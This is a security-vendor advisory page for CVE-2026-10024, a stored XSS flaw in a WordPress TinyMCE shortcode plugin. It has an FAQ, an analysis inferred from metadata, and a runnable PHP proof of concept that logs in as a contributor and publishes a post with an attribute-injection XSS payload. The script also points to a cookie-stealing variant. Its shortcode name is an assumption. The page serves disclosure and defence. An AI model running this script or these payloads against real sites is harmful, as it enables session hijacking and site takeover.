What is CVE-2026-10024?

CVE-2026-10024 is a Stored Cross-Site Scripting (XSS) vulnerability found in the TinyMCE shortcode Addon plugin for WordPress, affecting versions up to and including 1.0.0. This vulnerability allows authenticated users with contributor-level access or higher to inject malicious JavaScript into WordPress pages via the ‘btnrel’ shortcode attribute.

How does the vulnerability work?

The vulnerability occurs due to insufficient input sanitization and output escaping in the handling of the ‘btnrel’ attribute. An attacker can create or edit a post with a malicious payload in the shortcode, which is then stored in the database and executed when any user views the affected page.

Who is affected by this vulnerability?

Any WordPress site using the TinyMCE shortcode Addon plugin version 1.0.0 or earlier is at risk. Specifically, authenticated users with contributor-level access and above can exploit this vulnerability to inject scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if the TinyMCE shortcode Addon plugin is installed and its version is 1.0.0 or earlier. If so, review any posts or pages for the use of the ‘btnrel’ shortcode and consider testing for potential script injections.

What steps should I take to fix this issue?

To mitigate this vulnerability, you should disable the TinyMCE shortcode Addon plugin or replace it with an alternative. Additionally, if you are a developer, ensure that proper input sanitization and output escaping are implemented in the plugin.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the attack requires authentication, it can still lead to significant security risks, including unauthorized script execution and potential data compromise.

What is Stored Cross-Site Scripting (XSS)?

Stored Cross-Site Scripting (XSS) is a type of security vulnerability that allows an attacker to inject malicious scripts into web pages viewed by other users. This can lead to session hijacking, data theft, or site defacement.

How does the proof of concept demonstrate the issue?

The proof of concept (PoC) provided illustrates how an attacker can exploit the vulnerability by authenticating as a contributor and injecting a malicious payload through the ‘btnrel’ shortcode. It serves as a practical example of how the vulnerability can be exploited in a real-world scenario.

What are the potential risks of this vulnerability?

If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of a user’s browser. This may lead to session hijacking, theft of sensitive information, or unauthorized actions on behalf of administrators.

Are there any known exploits for this vulnerability?

As of now, there are no publicly reported exploits specifically targeting this vulnerability. However, the nature of the vulnerability makes it a potential target for attackers with contributor-level access.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, immediately review your posts for unauthorized scripts, change passwords for affected users, and consider restoring from a backup. Additionally, conduct a thorough security audit of your site.

Is there a patch available for this vulnerability?

Currently, there is no patched version of the TinyMCE shortcode Addon plugin available. Website owners should disable the plugin or seek alternative solutions until a fix is released.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 9, 2026

CVE-2026-10024: TinyMCE shortcode Addon <= 1.0.0 Authenticated (Contributor+) Stored Cross-Site Scripting via 'btnrel' Shortcode Attribute PoC, Patch Analysis & Rule

CVE ID CVE-2026-10024

Plugin 360crest-themeone-tinymce-shortcodes

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.0.0

Patched Version —

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-10024 (metadata-based):

This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the TinyMCE shortcode Addon plugin for WordPress, affecting versions up to and including 1.0.0. The vulnerability resides in the ‘btnrel’ shortcode attribute, which fails to properly sanitize user input and escape output, allowing attackers with contributor-level access or higher to inject arbitrary JavaScript into pages. The CVSS score of 6.4 (Medium) reflects the authenticated nature of the attack and the partial impact on confidentiality and integrity, with no effect on availability.

Root Cause: Based on the CWE-79 classification and the vulnerability description, the root cause is insufficient input sanitization and output escaping in the plugin’s handling of the ‘btnrel’ shortcode attribute. In WordPress, shortcodes often accept attributes that are directly incorporated into HTML without proper escaping. The plugin likely registers a shortcode (e.g., [themebtn] or similar) and processes the ‘btnrel’ attribute by concatenating it into the rendered HTML without using WordPress’s built-in escaping functions like esc_attr() or wp_kses(). This is an inferred conclusion from the CWE and description, as no source code diff is available for confirmation.

Exploitation: An authenticated attacker with contributor-level access can exploit this by creating or editing a post or page and inserting the vulnerable shortcode with a malicious payload in the ‘btnrel’ attribute. For example, the shortcode might be [themebtn btnrel=” onclick=alert(1)”] or [themebtn btnrel=””>alert(document.cookie)”]. When the post is saved, the injected script is stored in the database and executed in the browser of any user viewing the page. The attack does not require any additional user interaction beyond visiting the page. The plugin’s AJAX or REST endpoints are not specifically identified from the metadata, but the attack vector is consistent with WordPress’s shortcode processing during post rendering.

Remediation: The fix requires the plugin developer to implement proper input sanitization and output escaping on the ‘btnrel’ shortcode attribute. Specifically, the plugin should use WordPress’s esc_attr() function when outputting the attribute value in HTML context, and should sanitize input with sanitize_text_field() or similar functions. Additionally, the use of wp_kses_allowed_html() or wp_kses_post() could be applied to restrict allowed HTML tags and attributes. Since no patched version is available, website owners should disable the plugin entirely or replace it with an alternative.

Impact: Successful exploitation allows authenticated attackers with contributor-level privileges to inject arbitrary JavaScript into WordPress pages. This can lead to session hijacking, theft of authentication cookies, defacement of site content, redirection to malicious sites, or execution of actions on behalf of administrators. Given that contributor-level accounts are low-privilege, the attack could propagate to higher-privilege users (e.g., administrators) who view the infected page, resulting in account takeover or full site compromise.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-10024 - TinyMCE shortcode Addon <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'btnrel' Shortcode Attribute

// WARNING: This script is for educational and authorized testing purposes only.
// Use only on systems you own or have explicit permission to test.

echo "[+] Atomic Edge CVE-2026-10024 PoC (metadata-based)nn";

// Configuration - modify these values
$target_url = "http://example.com";  // Target WordPress site URL (no trailing slash)
$username = "contributor";            // WordPress username with contributor role
$password = "contributor_password";   // Password for the above user

// Step 1: Authenticate to WordPress and get cookies
$login_url = $target_url . "/wp-login.php";
$post_data = [
    "log" => $username,
    "pwd" => $password,
    "wp-submit" => "Log In",
    "redirect_to" => $target_url . "/wp-admin/",
    "testcookie" => 1
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cve_cookies.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, "location:") !== false || strpos($response, "wp-admin") !== false) {
    echo "[+] Authentication successful as '{$username}'.n";
} else {
    echo "[!] Authentication failed. Check credentials.n";
    exit(1);
}

// Step 2: Get a fresh nonce for creating a post via REST API or admin-ajax
// For this PoC, we use the WordPress REST API (requires WP 4.7+)
$nonce_url = $target_url . "/wp-admin/admin-ajax.php?action=rest-nonce";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $nonce_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, "/tmp/cve_cookies.txt");
$nonce = curl_exec($ch);
curl_close($ch);

if (!$nonce) {
    echo "[!] Could not retrieve REST API nonce. Falling back to manual nonce extraction.n";
    // Alternative: fetch the admin page and extract nonce from the page source
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url . "/wp-admin/post-new.php");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "/tmp/cve_cookies.txt");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $admin_page = curl_exec($ch);
    curl_close($ch);
    preg_match('/"restNonce":"([^"]+)"/', $admin_page, $matches);
    if (isset($matches[1])) {
        $nonce = $matches[1];
    } else {
        echo "[!] Nonce extraction failed. PoC cannot continue.n";
        exit(1);
    }
}

// Step 3: Create a new post with the malicious shortcode
// Assumed shortcode: [themebtn btnrel="XSS_PAYLOAD"] or similar
$post_title = "CVE-2026-10024 Test Post - " . date("Y-m-d H:i:s");
$payload = '" onclick=alert(1) onmouseover=alert(2) ';  // Classic XSS via attribute injection
$post_content = '[themebtn btnrel="' . $payload . '"]Click here[/themebtn]';

$post_body = [
    "title" => $post_title,
    "content" => $post_content,
    "status" => "publish",
    "slug" => strtolower(str_replace(" ", "-", $post_title))
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . "/wp-json/wp/v2/posts");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_body));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Content-Type: application/json",
    "X-WP-Nonce: " . $nonce
]);
curl_setopt($ch, CURLOPT_COOKIEFILE, "/tmp/cve_cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 201) {
    $response_data = json_decode($result, true);
    $post_id = $response_data["id"] ?? "unknown";
    $post_link = $response_data["link"] ?? "unknown";
    echo "[+] Post created successfully!n";
    echo "[+] Post ID: {$post_id}n";
    echo "[+] Post URL: {$post_link}n";
    echo "[+] Payload: " . htmlspecialchars($payload) . "n";
    echo "n[!] Visit the post URL as any user (admin, editor, or visitor). The injected script will execute.n";
    echo "[!] For a more harmful payload, replace alert(1) with: alert(document.cookie)n";
} else {
    echo "[!] Failed to create post. HTTP code: {$http_code}n";
    echo "[!] Response: " . substr($result, 0, 500) . "n";
}

// Clean up cookie file
@unlink("/tmp/cve_cookies.txt");

// Note: The exact shortcode name (e.g., [themebtn]) is assumed based on the plugin slug '360crest-themeone-tinymce-shortcodes'.
// If the actual shortcode differs, adjust the $post_content variable accordingly.
?>

Frequently Asked Questions

What is CVE-2026-10024?
Overview of the vulnerability
CVE-2026-10024 is a Stored Cross-Site Scripting (XSS) vulnerability found in the TinyMCE shortcode Addon plugin for WordPress, affecting versions up to and including 1.0.0. This vulnerability allows authenticated users with contributor-level access or higher to inject malicious JavaScript into WordPress pages via the ‘btnrel’ shortcode attribute.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs due to insufficient input sanitization and output escaping in the handling of the ‘btnrel’ attribute. An attacker can create or edit a post with a malicious payload in the shortcode, which is then stored in the database and executed when any user views the affected page.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the TinyMCE shortcode Addon plugin version 1.0.0 or earlier is at risk. Specifically, authenticated users with contributor-level access and above can exploit this vulnerability to inject scripts.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify if the TinyMCE shortcode Addon plugin is installed and its version is 1.0.0 or earlier. If so, review any posts or pages for the use of the ‘btnrel’ shortcode and consider testing for potential script injections.
What steps should I take to fix this issue?
Recommended remediation actions
To mitigate this vulnerability, you should disable the TinyMCE shortcode Addon plugin or replace it with an alternative. Additionally, if you are a developer, ensure that proper input sanitization and output escaping are implemented in the plugin.
What does the CVSS score of 6.4 mean?
Understanding the severity rating
A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the attack requires authentication, it can still lead to significant security risks, including unauthorized script execution and potential data compromise.
What is Stored Cross-Site Scripting (XSS)?
Definition and implications
Stored Cross-Site Scripting (XSS) is a type of security vulnerability that allows an attacker to inject malicious scripts into web pages viewed by other users. This can lead to session hijacking, data theft, or site defacement.
How does the proof of concept demonstrate the issue?
Purpose of the PoC
The proof of concept (PoC) provided illustrates how an attacker can exploit the vulnerability by authenticating as a contributor and injecting a malicious payload through the ‘btnrel’ shortcode. It serves as a practical example of how the vulnerability can be exploited in a real-world scenario.
What are the potential risks of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of a user’s browser. This may lead to session hijacking, theft of sensitive information, or unauthorized actions on behalf of administrators.
Are there any known exploits for this vulnerability?
Current status of exploitation
As of now, there are no publicly reported exploits specifically targeting this vulnerability. However, the nature of the vulnerability makes it a potential target for attackers with contributor-level access.
What should I do if I suspect exploitation?
Response to potential incidents
If you suspect that your site has been exploited, immediately review your posts for unauthorized scripts, change passwords for affected users, and consider restoring from a backup. Additionally, conduct a thorough security audit of your site.
Is there a patch available for this vulnerability?
Status of updates
Currently, there is no patched version of the TinyMCE shortcode Addon plugin available. Website owners should disable the plugin or seek alternative solutions until a fix is released.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations